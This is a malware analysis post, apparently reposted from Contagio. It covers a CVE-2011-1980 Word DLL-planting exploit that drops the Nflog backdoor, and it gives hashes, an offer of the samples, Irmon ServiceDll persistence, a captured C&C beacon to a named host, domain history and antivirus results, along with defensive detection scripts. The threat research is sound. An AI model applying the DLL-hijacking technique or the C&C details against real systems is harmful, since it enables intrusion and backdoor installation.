Nytro

Feb 9 CVE-2011-1980 MSOffice DLL Loading vulnerability + Trojan Nflog

Wednesday, February 15, 2012

On February 9, 2012 Symantec disclosed that the previously patched MS Office insecure library loading vulnerability was exploited in the wild. DLL loading vulnerabilities were used in targeted attacks with at least two other exploits in 2011, and they did not reach epidemic proportions as happened with the CVE-2010-3333 RTF exploit or some of the Adobe PDF exploits. I refer to

Contagio: Sept. 23 CVE-2011-1991 type (1) deskpan.dll Windows components DLL loading vulnerability

and

Contagio: Apr 13 CVE-2011-2100 PDF - Adobe DLL Loading Vulnerability - Agenda.7z

DLL search order hijacking exploits had and will have many new reincarnations because of the DLL loading preference order - Current Working Directory is preferred for most DLL files. You can read more about the root of these problems (not necessarily related to MS Office but in general) in

M-unition: DLL Search Order Hijacking Revisited by Nick Harbour

As described in the Symantec article, fputlsat.dll must be present in the same directory as the Word document in order to be activated by the ActiveX control embedded in the Word document. The payload of this sample is the backdoor trojan Nflog.

Common Vulnerabilities and Exposures (CVE) number

CVE-2011-1980 Untrusted search path vulnerability in Microsoft Office 2003 SP3 and 2007 SP2 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a .doc, .ppt, or .xls file, aka "Office Component Insecure Library Loading Vulnerability."

General File Information

File: 275c5ac2067d17187a71b94ccfdc4608.doc
Size: 22016
MD5: 275C5AC2067D17187A71B94CCFDC4608

File: fputlsat.dll
Size: 126976
MD5: 60068812B59E58D6338AAEBD649F9020

Download

Download as a password protected archive (email me if you need the password)

File Description

File: 275c5ac2067d17187a71b94ccfdc4608.doc
Size: 22016
MD5: 275C5AC2067D17187A71B94CCFDC4608

[Screenshot: Before the document is opened, the DLL file is present in the same directory]

The Word document has an embedded macro, an ActiveX ListView form control (a very common ActiveX control), which calls fputlsat.dll, the "Microsoft Office FrontPage Client Utility Library". There is nothing unusual about this behavior; you can read more about this particular control in "Using the ListView ActiveX Control", and it is normal for it to call FrontPage libraries.

The vulnerability lies in the fact that a DLL located in the same folder as the Word document will be loaded before the legitimate DLL in C:\Program Files\Microsoft Office\Office\.. or other directories.

[Screenshot: After the document is opened, the DLL file is renamed to Thumbs.db]
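A defender-side check for the two on-disk artifacts described above (a loadable module planted beside an Office document, and the planted DLL surviving as a "Thumbs.db" that is really a PE image). This is an added example, not code from the Contagio post; the folder contents and the stub PE bytes are constructed for the demo.

```python
"""Added example: flag DLL-planting artifacts in a folder that holds Office
documents, as seen with CVE-2011-1980.  A genuine Thumbs.db is an OLE compound
file (starts with D0 CF 11 E0), never a PE image, so a 'Thumbs.db' with an MZ/PE
header is a strong indicator that a planted DLL was renamed after use.
"""
import os
import struct
import tempfile

OFFICE_EXTS = {".doc", ".ppt", ".xls"}

def is_pe_image(path):
    """True if the file has an MZ header whose e_lfanew points at 'PE\\0\\0'."""
    try:
        with open(path, "rb") as f:
            head = f.read(0x40)
            if len(head) < 0x40 or head[:2] != b"MZ":
                return False
            e_lfanew = struct.unpack_from("<I", head, 0x3C)[0]
            f.seek(e_lfanew)
            return f.read(4) == b"PE\x00\x00"
    except OSError:
        return False

def scan_folder(folder):
    """Return sorted (filename, reason) findings for one folder."""
    names = os.listdir(folder)
    has_office_doc = any(os.path.splitext(n)[1].lower() in OFFICE_EXTS for n in names)
    findings = []
    for n in names:
        path = os.path.join(folder, n)
        if not os.path.isfile(path) or not is_pe_image(path):
            continue
        ext = os.path.splitext(n)[1].lower()
        if n.lower() == "thumbs.db":
            findings.append((n, "Thumbs.db is a PE image (renamed planted DLL)"))
        elif has_office_doc and ext in {".dll", ".ocx"}:
            findings.append((n, "loadable module next to an Office document"))
        elif has_office_doc:
            findings.append((n, "PE image with non-DLL extension next to an Office document"))
    return sorted(findings)

def _fake_pe():
    """Constructed stub: 'MZ', e_lfanew = 0x40, then 'PE\\0\\0'.  Not a real DLL."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    return bytes(dos) + b"PE\x00\x00" + b"\x00" * 20

def demo():
    """Build a constructed folder mirroring the post's 'after open' state and scan it."""
    d = tempfile.mkdtemp()
    with open(os.path.join(d, "report.doc"), "wb") as f:      # OLE header, not PE
        f.write(b"\xd0\xcf\x11\xe0" + b"\x00" * 60)
    with open(os.path.join(d, "fputlsat.dll"), "wb") as f:     # planted module
        f.write(_fake_pe())
    with open(os.path.join(d, "Thumbs.db"), "wb") as f:        # renamed planted DLL
        f.write(_fake_pe())
    return scan_folder(d)

if __name__ == "__main__":
    for name, reason in demo():
        print(name, "-", reason)
```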

[Screenshot: Activity after the exploit launch]

Examination of the ActiveX component shows the original path of the macro/control as it existed on the author's computer: C:\Documents and Settings\Bandit\Local Settings\Temp\Word8.0\FPDTC.DLL (nice user name).

Office 8.0 is Office 97 (yes, eons ago) and FPDTC.DLL is a FrontPage Design Time Control that was used around 2000-2001. Considering this, I wonder whether this vulnerability not only existed but was also used, with minor tweaks, through all versions of MS Office, starting with Office 97 and ending with Office 2010, when we finally found it out. Perhaps Microsoft Office/VB gurus will be able to answer and/or correct me.

[Screenshot: List view control]

Upon launch, the user is presented with a choice to run or not to run ActiveX controls. By that time the exploit has already worked and the files were dropped/renamed. Answering Yes will allow the dropped payload iede32.ocx to run.

[Screenshot: ActiveX prompt]

The picture below shows the locations of the dropped file and the registry changes.

[Screenshot: dropped file locations and registry changes]

[Screenshot: SVCHOST.EXE process injection]

File: fputlsat.dll
Size: 126976
MD5: 60068812B59E58D6338AAEBD649F9020

fputlsat.dll (thumbs.db) strings

Unicode Strings:
---------------------------------------------------------------------------

Adobe Photoshop ---- ???
Adobe Photoshop 6.0 ----- ? Unknown if these artifacts mean anything. Photoshop is just as old. Maybe the same DLL code was used for other products.

VS_VERSION_INFO
StringFileInfo
040404b0
Comments:
CompanyName: Microsoft Corporation
FileDescription: Microsoft Office FrontPage Client Utility Library
FileVersion: 11.0.5510.0
InternalName: FP40CUTL
LegalCopyright: Copyright© Microsoft Corporation 2003. All rights reserved.
LegalTrademarks:
OriginalFilename: FP40CUTL
PrivateBuild:
ProductName: FP40CUTL.DLL -- FrontPage 2000 file. Wonder if Word 2000 was affected too.
ProductVersion: 11, 0, 0, 0
SpecialBuild:
VarFileInfo
Translation

Created Files

File: iede32.ocx
Size: 13824
MD5: D4859FC951652B3C9657F8621D4DB625

Virustotal

The trojan starts its activity with POST /NfLog/Nfile.asp. This trojan is not new; for example, there were zero-day CVE-2011-2462 files carrying the same trojan. The service modified is irmon (frequently abused by these types of attacks; here is a ThreatExpert report of a very common APT backdoor using the same service).


Key Name: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Irmon\Parameters

Class Name: <NO CLASS>

Last Write Time: 2/14/2012 - 1:40 AM

Value 0

Name: ServiceDll

Type: REG_EXPAND_SZ

Data: C:\WINDOWS\system32\iede32.ocx
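The registry dump above shows the persistence mechanism: the svchost-hosted Irmon service has its ServiceDll pointed at the dropped iede32.ocx. The following added example (not the post's own tooling) parses that same "Key Name: / Value N / Name: / Type: / Data:" dump format and flags redirected ServiceDll values; the sample dump and the baseline of expected module names are constructed assumptions for the demo.

```python
"""Added example: detect svchost ServiceDll redirection in a registry text dump.
Two checks are applied per Services\\<name>\\Parameters\\ServiceDll value:
  1. the module is not a .dll (e.g. the .ocx seen in this sample);
  2. the module basename differs from an assumed per-service baseline.
"""
import re

# Assumed baseline: service name -> expected ServiceDll basename.  irmon.dll is
# the stock Infrared Monitor module on Windows XP; extend this map for real use.
EXPECTED_SERVICEDLL = {"irmon": "irmon.dll", "dhcp": "dhcpcsvc.dll"}

_SERVICES_RE = re.compile(r"\\Services\\([^\\]+)\\Parameters$", re.IGNORECASE)

def parse_dump(text):
    """Yield (service, value_name, value_type, data) for values under Services\\*\\Parameters."""
    key = name = vtype = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Key Name:"):
            key = line.split(":", 1)[1].strip()
            name = vtype = None
        elif line.startswith("Name:"):
            name = line.split(":", 1)[1].strip()
        elif line.startswith("Type:"):
            vtype = line.split(":", 1)[1].strip()
        elif line.startswith("Data:") and key and name:
            data = line.split(":", 1)[1].strip()
            m = _SERVICES_RE.search(key)
            if m:
                yield m.group(1), name, vtype, data
            name = vtype = None

def find_servicedll_hijacks(text):
    """Return a list of (service, data, reason) for suspicious ServiceDll values."""
    findings = []
    for svc, vname, _vtype, data in parse_dump(text):
        if vname.lower() != "servicedll":
            continue
        base = data.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        reasons = []
        if not base.endswith(".dll"):
            reasons.append("module is not a .dll (%s)" % base)
        expected = EXPECTED_SERVICEDLL.get(svc.lower())
        if expected and base != expected:
            reasons.append("expected %s" % expected)
        if reasons:
            findings.append((svc, data, "; ".join(reasons)))
    return findings

# Constructed sample: the Irmon key from the post plus a benign DHCP client entry.
SAMPLE_DUMP = r"""
Key Name: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Irmon\Parameters
Class Name: <NO CLASS>
Last Write Time: 2/14/2012 - 1:40 AM
Value 0
Name: ServiceDll
Type: REG_EXPAND_SZ
Data: C:\WINDOWS\system32\iede32.ocx

Key Name: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dhcp\Parameters
Class Name: <NO CLASS>
Last Write Time: 1/10/2012 - 9:12 AM
Value 0
Name: ServiceDll
Type: REG_EXPAND_SZ
Data: %SystemRoot%\System32\dhcpcsvc.dll
"""

if __name__ == "__main__":
    for svc, data, reason in find_servicedll_hijacks(SAMPLE_DUMP):
        print("%s -> %s (%s)" % (svc, data, reason))
```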

Traffic

In my case, the C&C was not active, or at least I didn't receive any traffic, but you can see the initial POST and the domain name.

POST /IElog/TestURL.asp HTTP/1.0

User-Agent: www

Host: www.aviraco.com

Content-Length: 10

Pragma: no-cache

1234567890

HTTP/1.1 400 Bad Request

Content-Type: text/html

Date: Tue, 14 Feb 2012 05:39:57 GMT

Connection: close

Content-Length: 39

<h1>Bad Request (Invalid Hostname)</h1>

Domain Name : aviraco.com

PunnyCode : aviraco.com

Creation Date : 2011-03-30 10:31:10

Updated Date : 2011-03-30 10:31:10

Expiration Date : 2012-03-30 10:31:10

Registrant:

Organization : zhipengwang

Name : zhipengwang

Address : Zhongguancun Hailong Building, Room 1005

City : haidianqu

Province/State : beijingshi

Country : china

Postal Code : 100083

216.83.63.147

Host reachable, 408 ms. average

216.83.32.0 - 216.83.63.255

Ethr.Net LLC

7960B Soquel Dr. #417

Aptos

CA

95003

United States

IP Address History

Event Date / Action / Pre-Action IP / Post-Action IP

2009-12-28 New -none- 174.37.172.68

2010-09-13 Change 174.37.172.68 67.228.81.181

2010-09-24 Change 67.228.81.181 174.37.172.68

2011-02-02 Change 174.37.172.68 67.228.81.180

2011-02-13 Not Resolvable 67.228.81.180 -none-

2011-10-14 New -none- 98.126.113.28

2011-10-25 Change 98.126.113.28 216.83.63.14

Registrar History

Date / Registrar

2009-12-26 Name.com aka DomainSite

2011-03-29 Xin Net

Name Server History

Event Date / Action / Pre-Action Server / Post-Action Server

2009-12-28 New -none- Name.com

2011-02-08 Delete Name.com -none-

2011-03-31 New Xinnet.cn Xinnetdns.com

2011-12-13 Transfer Xinnetdns.com Xincache.com

RR

www.comedns.com. A 216.83.63.147

www.creamofa.com. A 216.83.63.147

Automated Scans

Virustotal

SHA256: 429f206f2c68014c75f8a6ae09e68dd672401e461dd2fa72b9087bb5ee530d1e

SHA1: 7dbf130964cdc0110fd517a5d98188df3d56e850

MD5: 275c5ac2067d17187a71b94ccfdc4608

File size: 21.5 KB ( 22016 bytes )

File name: report.doc

File type: MS Word Document

Detection ratio: 17 / 43

Analysis date: 2012-02-15 04:10:05 UTC ( 46 minutes ago )

Antivirus Result Update

AhnLab-V3 Dropper/Ms11-073 20120213

AVG Exploit_c.UDK 20120213

ClamAV Exploit.Doc-2 20120214

Emsisoft Exploit.MSWord.CVE-2011!IK 20120214

eSafe - 20120213

eTrust-Vet - 20120213

Fortinet W97M/CVE_2011_1980.A!exploit 20120214

Ikarus Exploit.MSWord.CVE-2011 20120214

Kaspersky Exploit.MSWord.CVE-2011-1980.a 20120214

McAfee Exploit-CVE2011-1980 20120214

McAfee-GW-Edition - 20120213

Microsoft Exploit:Win32/Actjack.A 20120213

NOD32 W97M/Exploit.CVE-2011-1980.A 20120214

nProtect Trojan-Exploit/W32.Agent.22016 20120213

PCTools Trojan.Generic 20120207

Sophos Troj/Hijack-H 20120214

SUPERAntiSpyware - 20120206

Symantec Trojan.Activehijack 20120214

TrendMicro TROJ_ACTIVEHIJ.A 20120213

TrendMicro-HouseCall TROJ_ACTIVEHIJ.A 20120214

ViRobot Doc.S.MS11-073.22016 20120213

Virustotal

SHA256: 48bc6c0df3302f7eaa6061c4f3b0357b4c512d5bd6f6088abc6fc274f2efc5aa

SHA1: 8f86b7fcaf0c1ee9b795fa8e559def47ef468128

MD5: 60068812b59e58d6338aaebd649f9020

File size: 124.0 KB ( 126976 bytes )

File name: fputlsat.dll

File type: Win32 DLL

Detection ratio: 28 / 43

Analysis date: 2012-02-15 04:10:02 UTC ( 23 minutes ago )

AhnLab-V3 Win-Trojan/Activehijack.126976 20120213

AntiVir TR/Drop.Kaliox.A 20120213

Avast Win32:Malware-gen 20120214

BitDefender Trojan.Generic.KD.529689 20120214

DrWeb Trojan.MulDrop3.34467 20120214

Emsisoft Trojan-Dropper.Win32.Agent!IK 20120214

F-Secure Trojan.Generic.KD.529689 20120214

Fortinet W32/Agent.PRG!tr 20120214

GData Trojan.Generic.KD.529689 20120214

Ikarus Trojan-Dropper.Win32.Agent 20120214

K7AntiVirus Riskware 20120213

Kaspersky Trojan-Dropper.Win32.Agent.gjnt 20120214

McAfee Generic Dropper.p 20120214

McAfee-GW-Edition Artemis!60068812B59E 20120213

Microsoft TrojanDropper:Win32/Kaliox.A 20120213

NOD32 Win32/TrojanDropper.Agent.PRG 20120214

Norman W32/Agent.XGSO 20120213

nProtect Trojan-Dropper/W32.Agent.126976.CS 20120213

PCTools Trojan.Dropper 20120207

Symantec Trojan.Dropper 20120214

TrendMicro TROJ_MULDROP.IC 20120213

TrendMicro-HouseCall TROJ_MULDROP.IC 20120214

VIPRE Trojan.Win32.Generic!BT 20120214

ViRobot Trojan.Win32.Activehijack.126976 20120213

VirusBuster Trojan.DR.Agent!ly6ZRARwo6A

Virustotal

SHA256: 27c87e7993c5661dd3b65e51df5884519fc0234bf36de72082644fa909ccb793

SHA1: d0c3e34bd97c4aa56fe9f176954d274595926a32

MD5: d4859fc951652b3c9657f8621d4db625

File size: 13.5 KB ( 13824 bytes )

File name: iede32.ocx

File type: Win32 DLL

Detection ratio: 28 / 42

Analysis date: 2012-02-14 04:13:46 UTC ( 1 day, 2 hours ago )


AhnLab-V3 Win-Trojan/Activehijack.13824 20120213

AntiVir TR/Spy.13824.71 20120214

Antiy-AVL Trojan/Win32.Genome.gen 20120213

BitDefender Gen:Trojan.Heur.LP.aq4@aqXBVhe 20120214

Comodo TrojWare.Win32.GameThief.Nilage.~CRSH 20120214

DrWeb Trojan.Click2.13847 20120214

Emsisoft Trojan.Win32.Spy!IK 20120214

eSafe Win32.GenHeur.LP.Aq@ 20120213

F-Secure Gen:Trojan.Heur.LP.aq4@aqXBVhe 20120214

Fortinet W32/Agent.OLJ 20120214

GData Gen:Trojan.Heur.LP.aq4@aqXBVhe 20120214

Ikarus Trojan.Win32.Spy 20120214

K7AntiVirus Riskware 20120213

Kaspersky Trojan.Win32.Genome.aehtz 20120214

McAfee Generic Dropper.p 20120214

McAfee-GW-Edition Artemis!D4859FC95165 20120213

Microsoft TrojanDownloader:Win32/Kaliox.A 20120213

NOD32 Win32/Agent.OLJ 20120214

Norman W32/Troj_Generic.KIKX 20120213

nProtect Trojan/W32.Genome.13824.J 20120213

Sophos Troj/Spy-YL 20120214

Symantec Trojan.Gen.2 20120214

TheHacker Trojan/Agent.olj 20120213

TrendMicro BKDR_CONIP.A 20120214

TrendMicro-HouseCall BKDR_CONIP.A 20120214

ViRobot Trojan.Win32.Activehijack.13824 20120214

VirusBuster Trojan.Agent!KGIS/NcFcUc 20120213

Source: contagio: Feb 9 CVE-2011-1980 MSOffice DLL Loading vulnerability + Trojan Nflog
